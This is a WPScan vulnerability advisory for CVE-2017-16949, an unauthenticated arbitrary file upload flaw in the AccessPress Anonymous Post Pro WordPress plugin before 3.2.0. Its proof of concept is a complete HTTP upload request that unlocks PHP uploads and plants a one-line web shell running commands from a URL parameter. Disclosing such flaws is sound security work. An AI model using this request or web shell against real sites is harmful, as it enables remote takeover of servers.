AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload



Description
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters.
Proof of Concept
OST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host:target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

-----------------------------7230359611602921801124357792--

Affects Plugin

fixed in version 3.2.0

References

CVE 2017-16949
PACKETSTORM 145398
URL https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Colette Chamberland
Submitter Website https://defiant.com
Submitter Twitter @cjchamberland
Views 1324
Verified No
WPVDB ID 8977

Timeline

Publicly Published 2017-12-19 (12 months ago)
Added 2017-12-19 (12 months ago)
Last Updated 2017-12-19 (12 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.